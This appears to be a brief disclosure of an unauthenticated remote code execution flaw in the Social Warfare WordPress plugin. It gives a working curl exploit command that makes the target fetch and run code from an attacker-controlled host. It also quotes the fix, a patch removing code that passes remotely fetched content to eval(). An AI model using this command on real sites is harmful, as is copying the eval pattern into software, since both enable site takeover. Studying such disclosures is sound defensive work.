RCE on a Social Warfare Wordpress plugin without any prior authentication
curl http://127.0.0.1/wp-admin/admin-post.php?rce=id&swp_debug=load_options&swp_url=http://172.18.0.1:1337/exploit.php
Vulnerable code:
Fix:
From 6295e4022de956e944fbf912c42f2ab20a6b28ff Mon Sep 17 00:00:00 2001
From: Cortland Mahoney <cortland.mahoney@gmail.com>
Date: Thu, 21 Mar 2019 18:53:41 -0400
Subject: [PATCH] Removed deprecated query parameter.
---
lib/utilities/SWP_Database_Migration.php | 65 ------------------------
1 file changed, 65 deletions(-)
diff --git a/lib/utilities/SWP_Database_Migration.php b/lib/utilities/SWP_Database_Migration.php
index 7cec1a25..2865993c 100644
--- a/lib/utilities/SWP_Database_Migration.php
+++ b/lib/utilities/SWP_Database_Migration.php
@@ -218,71 +218,6 @@ public function debug_parameters() {
// }
- /**
- * Migrates options from $_GET['swp_url'] to the current site.
- *
- * @since 3.4.2
- */
- if ( true == SWP_Utility::debug('load_options') ) {
- if (!is_admin()) {
- wp_die('You do not have authorization to view this page.');
- }
-
- $options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');
-
- //* Bad url.
- if (!$options) {
- wp_die('nothing found');
- }
-
- $pre = strpos($options, '<pre>');
- if ($pre != 0) {
- wp_die('No Social Warfare found.');
- }
-
- $options = str_replace('<pre>', '', $options);
- $cutoff = strpos($options, '</pre>');
- $options = substr($options, 0, $cutoff);
-
- $array = 'return ' . $options . ';';
-
- try {
- $fetched_options = eval( $array );
- }
- catch (ParseError $e) {
- $message = 'Error evaluating fetched data. <br/>';
- $message .= 'Message from error: ' . $e->getMessage() . '<br/>';
- $message .= 'Fetched data: <br/>';
- $message .= var_export($fetched_options, 1);
- wp_die($message);
- }
-
- if (is_array( $fetched_options) ) {
- foreach( $fetched_options as $key => $value) {
- if (strpos( $key, 'license' ) > 0) {
- unset( $fetched_options[$key] );
- }
- if (strpos( $key, 'token' ) > 0) {
- unset( $fetched_options[$key] );
- }
- if (strpos( $key, 'login' ) > 0) {
- unset( $fetched_options[$key] );
- }
- }
- //* Preserve filtered data, such as license keys.
- $new_options = array_merge( get_option('social_warfare_settings'), $fetched_options );
-
- if (update_option( 'social_warfare_settings', $new_options )) {
- wp_die('Social Warfare settings updated to match ' . $_GET['swp_url']);
- }
- else {
- wp_die('Tried to update settings to match ' . $_GET['swp_url'] . ', but something went wrong or no options changed.');
- }
- }
-
- wp_die('No changes made.');
- }
-
if ( true === SWP_Utility::debug('get_filtered_options') ) :
global $swp_user_options;
echo "<pre>";